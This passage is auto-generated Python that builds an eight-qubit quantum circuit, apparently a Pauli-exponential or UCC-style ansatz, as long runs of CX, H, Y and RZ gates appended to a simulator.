sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.732299, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.732299, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.732299, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.732299, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(1.732299, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.3668855, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.3668855, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.3668855, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.3668855, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.3668855, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.3668855, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.3668855, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(0.3668855, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(6, 4))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.179376, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.179376, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.179376, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.179376, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.179376, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.179376, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.179376, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.179376, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.087414, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.087414, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.087414, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.087414, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.087414, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.087414, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.087414, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.087414, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(6.281917, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(6.281917, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(6.281917, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(6.281917, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(6.281917, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(6.281917, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(6.281917, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(6.281917, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(5.860174, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(5.860174, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(5.860174, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(5.860174, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(5.860174, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(5.860174, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(3))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(5.860174, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(3))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.RZ(5.860174, 3))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(3))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(2.255147, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(4))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(2.255147, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(4))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(2.255147, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(4))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(2.255147, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(4))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(2.255147, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(4))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(2.255147, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.H(7))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(4))
sim.append(sim.Y(7))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(4))
sim.append(sim.CX(7, 6))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.RZ(2.255147, 4))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(7, 6))
sim.append(sim.Y(7))
